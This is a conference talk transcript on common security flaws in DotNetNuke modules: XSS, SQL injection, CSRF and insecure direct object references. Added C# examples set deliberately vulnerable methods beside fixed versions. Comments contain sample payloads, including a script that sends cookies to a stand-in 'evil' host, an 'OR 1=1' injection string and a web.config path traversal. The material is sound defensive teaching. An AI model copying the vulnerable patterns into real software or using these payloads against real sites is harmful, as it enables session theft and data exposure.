DNNcon 2016: Are There Security Flaws in Your DNN Modules?
Transcript of DNNcon 2016: Are There Security Flaws in Your DNN Modules?
@DNNCon Don’t forget to include #DNNCon in your tweets!
Are There Security Flaws in Your Modules?
Joshua Bradley / Web Developer, Engage Software
@JRBradley1
THANKS TO ALL OF OUR GENEROUS SPONSORS!
Agenda
• Introduction
• Cross Site Scripting
• SQL Injection
• Cross Site Request Forgery
• Insecure Direct Object References
• Q & A
Goal
For developers: to think about possible security vulnerabilities while developing your modules.
For everyone: to be able to recognize potential vulnerabilities when testing websites.
Introduction
Cross Site Scripting
Reflected XSS
Reflected XSS Example
Stored XSS
Stored XSS Example
XSS Summary
• HTML-encode user input on output whenever the field does not need to carry HTML.
• Use an Anti-XSS library when you need to accept HTML from user input (an encoder alone cannot be used there, since it would turn the markup you want to keep into literal text; the HTML has to be sanitized instead).
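The two XSS shapes from the talk, side by side with their fixes, as an added example that is not code from the talk or from DNN itself. It assumes a DNN 8 module project referencing DotNetNuke.dll and System.Web.dll; `ViewComments`, the `q` query parameter and the in-memory `CommentStore` are hypothetical names, and `PortalSecurity.Instance.InputFilter` with `FilterFlag.NoScripting` is DNN Platform's own input filter as I understand it, used here in place of the sanitizer the slide calls an "Anti XSS library":

```csharp
// Added example (not from the DNNCon talk). Assumes DotNetNuke.dll and System.Web.dll;
// the control, store and request field names are hypothetical.
using System;
using System.Collections.Generic;
using System.Net;                        // WebUtility.HtmlEncode
using System.Web.Security.AntiXss;       // AntiXssEncoder (.NET 4.5+)
using DotNetNuke.Entities.Modules;       // PortalModuleBase
using DotNetNuke.Security;               // PortalSecurity (assumed DNN API)

namespace MyModule
{
    // In-memory stand-in for the module's real persistence, so the file compiles on its own.
    public static class CommentStore
    {
        public static readonly List<string> Saved = new List<string>();
        public static void Save(int moduleId, int userId, string body) { Saved.Add(body); }
    }

    public partial class ViewComments : PortalModuleBase
    {
        // Reflected XSS: ?q=<script>new Image().src='http://evil/?'+document.cookie</script>
        // is written back into the page exactly as it arrived.
        private string SearchHeadingUnsafe()
        {
            string q = Request.QueryString["q"] ?? string.Empty;
            return "<h2>Results for " + q + "</h2>";
        }

        // Fixed: a search term never needs markup, so HTML-encode the whole value on output.
        // The payload above becomes literal text: &lt;script&gt;...&lt;/script&gt;
        private string SearchHeading()
        {
            string q = Request.QueryString["q"] ?? string.Empty;
            return "<h2>Results for " + WebUtility.HtmlEncode(q) + "</h2>";
        }

        // Stored XSS: the comment is saved as typed; every later visitor runs whatever it contains.
        private void SaveCommentUnsafe(string body)
        {
            CommentStore.Save(ModuleId, UserId, body);
        }

        // Fixed: comments may legitimately carry <b>, <i>, <a> ..., so encoding would destroy them.
        // Run them through DNN's input filter instead, which (as I understand NoScripting) strips
        // <script>, on* event handlers and javascript: URLs while keeping ordinary markup.
        private void SaveComment(string body)
        {
            string clean = PortalSecurity.Instance.InputFilter(body, PortalSecurity.FilterFlag.NoScripting);
            CommentStore.Save(ModuleId, UserId, clean);
        }

        // Encoding is context-specific: inside an attribute use the attribute encoder, and for a
        // URL also restrict the scheme, because "javascript:alert(1)" survives attribute encoding.
        private string ProfileLink(string displayName, string url)
        {
            Uri target;
            bool safeScheme = Uri.TryCreate(url, UriKind.Absolute, out target)
                              && (target.Scheme == Uri.UriSchemeHttp || target.Scheme == Uri.UriSchemeHttps);
            string href = safeScheme ? AntiXssEncoder.HtmlAttributeEncode(target.AbsoluteUri) : "#";
            return "<a href=\"" + href + "\">" + AntiXssEncoder.HtmlEncode(displayName, false) + "</a>";
        }
    }
}
```

Output encoding stays the primary defence even for the filtered comments: the filter only removes what it recognises as script, so anything rendered into an attribute or a script block still needs the encoder for that context.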
SQL Injection
SQLi Example
SQLi Summary
• Never build SQL by string concatenation with user input.
• Use an ORM or a parameterized stored procedure, so that user-supplied values reach the database as parameters rather than as part of the statement text.
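The concatenation the slide warns about next to the parameterized forms it recommends, as an added example that is not code from the talk or from DNN. It assumes a DNN 7.3+ module using DAL2 (`DotNetNuke.Data`, with PetaPoco-style positional `@0` parameters, as I understand that API); the `Comment` class, the `MyModule_Comments` table and the `MyModule_SearchComments` procedure are hypothetical:

```csharp
// Added example (not from the DNNCon talk). Assumes DNN DAL2 (DotNetNuke.Data);
// the class, table and procedure names are hypothetical.
using System.Collections.Generic;
using System.Data;
using System.Linq;
using DotNetNuke.ComponentModel.DataAnnotations;
using DotNetNuke.Data;

namespace MyModule.Data
{
    [TableName("MyModule_Comments")]
    [PrimaryKey("CommentId", AutoIncrement = true)]
    [Scope("ModuleId")]
    public class Comment
    {
        public int CommentId { get; set; }
        public int ModuleId { get; set; }
        public string Author { get; set; }
        public string Body { get; set; }
    }

    public class CommentRepository
    {
        // Vulnerable: the search term becomes part of the statement. A term of
        //   x%' OR 1=1 --
        // closes the string, drops the ModuleId filter and comments out the rest,
        // returning every comment in every module; a UNION SELECT in the same spot
        // reads any table the site's connection can see.
        public IList<Comment> SearchUnsafe(int moduleId, string term)
        {
            using (IDataContext ctx = DataContext.Instance())
            {
                string sql = "SELECT * FROM MyModule_Comments WHERE ModuleId = " + moduleId
                           + " AND Body LIKE '%" + term + "%'";
                return ctx.ExecuteQuery<Comment>(CommandType.Text, sql).ToList();
            }
        }

        // Fixed: @0 and @1 are bound as parameters, so the term travels as data and the
        // quote in "x%' OR 1=1 --" is just a character inside the LIKE pattern.
        public IList<Comment> Search(int moduleId, string term)
        {
            using (IDataContext ctx = DataContext.Instance())
            {
                return ctx.ExecuteQuery<Comment>(CommandType.Text,
                    "SELECT * FROM MyModule_Comments WHERE ModuleId = @0 AND Body LIKE @1",
                    moduleId, "%" + term + "%").ToList();
            }
        }

        // The same query through the repository DAL2 builds from the attributes above.
        public IList<Comment> SearchViaRepository(int moduleId, string term)
        {
            using (IDataContext ctx = DataContext.Instance())
            {
                return ctx.GetRepository<Comment>()
                          .Find("WHERE ModuleId = @0 AND Body LIKE @1", moduleId, "%" + term + "%")
                          .ToList();
            }
        }

        // Parameterized stored procedure: the arguments are passed as procedure parameters.
        // This only helps if the procedure body does not rebuild the query itself with
        // EXEC(...) on a concatenated string.
        public IList<Comment> SearchViaProcedure(int moduleId, string term)
        {
            using (IDataContext ctx = DataContext.Instance())
            {
                return ctx.ExecuteQuery<Comment>(CommandType.StoredProcedure,
                    "MyModule_SearchComments", moduleId, "%" + term + "%").ToList();
            }
        }
    }
}
```

Parameterization stops injection; it does not neutralise LIKE wildcards, so a term containing `%` or `_` still matches more than the user typed and should be escaped if that matters to the module.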
Cross Site Request Forgery
CSRF Example
CSRF Summary
• Use HttpPost for any action that changes state.
• Validate an anti-forgery token on those actions (ValidateAntiForgeryToken).
• Never allow access from any host: do not open the module's API to arbitrary origins with a wildcard cross-origin allow list.
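A DNN Web API controller in its forgeable and protected forms, as an added example that is not code from the talk or from DNN. It assumes the DNN 7+ Services Framework (`DotNetNuke.Web.Api`: `DnnApiController`, `DnnAuthorize`, `DnnModuleAuthorize`, `ValidateAntiForgeryToken`, `IServiceRouteMapper`) as I recall that API; `MyModule`, `CommentController` and the in-memory `CommentStore` are hypothetical:

```csharp
// Added example (not from the DNNCon talk). Assumes DotNetNuke.Web.Api;
// module, controller and store names are hypothetical.
using System.Collections.Generic;
using System.Net;
using System.Net.Http;
using System.Web.Http;
using DotNetNuke.Security;
using DotNetNuke.Web.Api;

namespace MyModule.Services
{
    // In-memory stand-in for the module's real persistence, so the file compiles on its own.
    public static class CommentStore
    {
        public static readonly HashSet<int> Ids = new HashSet<int> { 41, 42, 43 };
        public static bool Delete(int id) { return Ids.Remove(id); }
    }

    public class DeleteRequest
    {
        public int CommentId { get; set; }
    }

    public class CommentController : DnnApiController
    {
        // Vulnerable: a state change reachable by GET with nothing but a "logged in?" check.
        // Any page the victim visits can embed
        //   <img src="/DesktopModules/MyModule/API/Comment/DeleteUnsafe?commentId=42">
        // and the browser attaches the victim's DNN cookies to that request.
        [HttpGet]
        [DnnAuthorize]
        public HttpResponseMessage DeleteUnsafe(int commentId)
        {
            CommentStore.Delete(commentId);
            return Request.CreateResponse(HttpStatusCode.OK);
        }

        // Fixed:
        //  * HttpPost removes the <img>/<a>/prefetch GET vector; a cross-site <form> can still
        //    POST, which is why the token is needed as well.
        //  * ValidateAntiForgeryToken requires the RequestVerificationToken header to match the
        //    anti-forgery cookie DNN issued to this user; a third-party page cannot read that
        //    value, so it cannot forge the request.
        //  * DnnModuleAuthorize requires Edit rights on the module named by the ModuleId/TabId
        //    headers, not merely a logged-in session.
        [HttpPost]
        [ValidateAntiForgeryToken]
        [DnnModuleAuthorize(AccessLevel = SecurityAccessLevel.Edit)]
        public HttpResponseMessage Delete(DeleteRequest body)
        {
            if (body == null || !CommentStore.Delete(body.CommentId))
                return Request.CreateResponse(HttpStatusCode.NotFound);
            return Request.CreateResponse(HttpStatusCode.OK);
        }
    }

    // Registers /DesktopModules/MyModule/API/{controller}/{action} for the controller above.
    public class RouteMapper : IServiceRouteMapper
    {
        public void RegisterRoutes(IMapRoute mapRouteManager)
        {
            mapRouteManager.MapHttpRoute("MyModule", "default", "{controller}/{action}",
                                         new[] { "MyModule.Services" });
        }
    }
}
```

On the client, the module's own script obtains `$.ServicesFramework(moduleId)` and passes its `setModuleHeaders` as the `beforeSend` of the POST; that call is what adds the ModuleId, TabId and RequestVerificationToken headers the protected action checks. A request lacking them, which is all a foreign origin can produce, is rejected before `Delete` runs.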
Insecure Direct Object References
IDOR Example
IDOR Summary
• Use the built-in Folder and File Manager, which apply DNN's folder permissions, rather than reading files from disk yourself.
• Avoid using user input when selecting a file; if an identifier must come from the request, check that the caller is allowed to see what it resolves to before serving it.
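A file download endpoint in its insecure-direct-object-reference form and in the form the slide recommends, as an added example that is not code from the talk or from DNN. It assumes the DNN 7+ Services Framework plus the `DotNetNuke.Services.FileSystem` API (`FileManager.Instance.GetFile`/`GetFileContent`, `FolderManager.Instance.GetFolder`) and `FolderPermissionController.CanViewFolder` as I recall them; `DownloadController` and the `Uploads` folder are hypothetical, and the controller would be registered through an `IServiceRouteMapper` like any DNN Web API controller:

```csharp
// Added example (not from the DNNCon talk). Assumes DotNetNuke.Web.Api and
// DotNetNuke.Services.FileSystem; controller and folder names are hypothetical.
using System.IO;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Web;
using System.Web.Http;
using DotNetNuke.Security.Permissions;
using DotNetNuke.Services.FileSystem;
using DotNetNuke.Web.Api;

namespace MyModule.Services
{
    public class DownloadController : DnnApiController
    {
        // Vulnerable IDOR: the request names the file and the only check is that it exists.
        // ?name=../../web.config walks out of the uploads folder and returns connection strings;
        // ?name=<another user's upload> returns it too, because the path is the whole "authorisation".
        [HttpGet]
        [DnnAuthorize]
        public HttpResponseMessage GetUnsafe(string name)
        {
            string path = HttpContext.Current.Server.MapPath("~/Portals/0/Uploads/" + name);
            if (!File.Exists(path))
                return Request.CreateResponse(HttpStatusCode.NotFound);
            var response = Request.CreateResponse(HttpStatusCode.OK);
            response.Content = new ByteArrayContent(File.ReadAllBytes(path));
            return response;
        }

        // Fixed: the request carries only an opaque id; the server resolves it through the
        // File Manager and lets DNN's folder permissions decide whether this caller may read it.
        [HttpGet]
        [DnnAuthorize]
        public HttpResponseMessage Get(int fileId)
        {
            IFileInfo file = FileManager.Instance.GetFile(fileId);
            // Unknown id, or an id that belongs to another portal on the same installation.
            if (file == null || file.PortalId != PortalSettings.PortalId)
                return Request.CreateResponse(HttpStatusCode.NotFound);

            IFolderInfo folder = FolderManager.Instance.GetFolder(file.FolderId);
            // Same 404 for "exists but not yours": a distinct 403 would let an attacker
            // enumerate which ids are real.
            if (folder == null || !FolderPermissionController.CanViewFolder((FolderInfo)folder))
                return Request.CreateResponse(HttpStatusCode.NotFound);

            string contentType = string.IsNullOrEmpty(file.ContentType)
                                 ? "application/octet-stream" : file.ContentType;
            var response = Request.CreateResponse(HttpStatusCode.OK);
            response.Content = new StreamContent(FileManager.Instance.GetFileContent(file));
            response.Content.Headers.ContentType = new MediaTypeHeaderValue(contentType);
            response.Content.Headers.ContentDisposition =
                new ContentDispositionHeaderValue("attachment") { FileName = file.FileName };
            return response;
        }
    }
}
```

Where the module only ever serves one configured file, the stronger form of the slide's advice is to take the file id from the module settings rather than from the request at all; the permission check above is for the case where the caller genuinely has to choose among files.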
Available on GitHub & Slideshare
• http://www.engagesoftware.com/blog/post/5052
Questions
@JRBradley1
Resources
• https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
• http://www.dnnsoftware.com/wiki/analysis-of-dotnetnuke-compliance-against-owasp-top-10-2013
• http://www.troyhunt.com/2012/12/stored-procedures-and-orms-wont-save.html
• https://www.owasp.org/index.php/Main_Page
• http://www.jwaffinityit.com/Portals/28/Documents/DNN/Analysis%20of%20DotNetNuke%20compliance%20against%20OWASP%20Top%2010.pdf
• https://msdn.microsoft.com/en-us/library/system.web.security.antixss.antixssencoder(v=vs.110).aspx
• https://weblog.west-wind.com/posts/2012/Jul/19/NET-HTML-Sanitation-for-rich-HTML-Input
• http://www.computerweekly.com/tip/Cross-site-request-forgery-Lessons-from-a-CSRF-attack-example
• http://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/
• https://www.sql-programmers.com/sql-injection.aspx
• https://msdn.microsoft.com/en-us/library/bb386929.aspx
• https://msdn.microsoft.com/en-us/library/cc716760.aspx
• http://www.troyhunt.com/2013/07/everything-you-wanted-to-know-about-sql.html
• https://github.com/malcomvetter/WidgetSender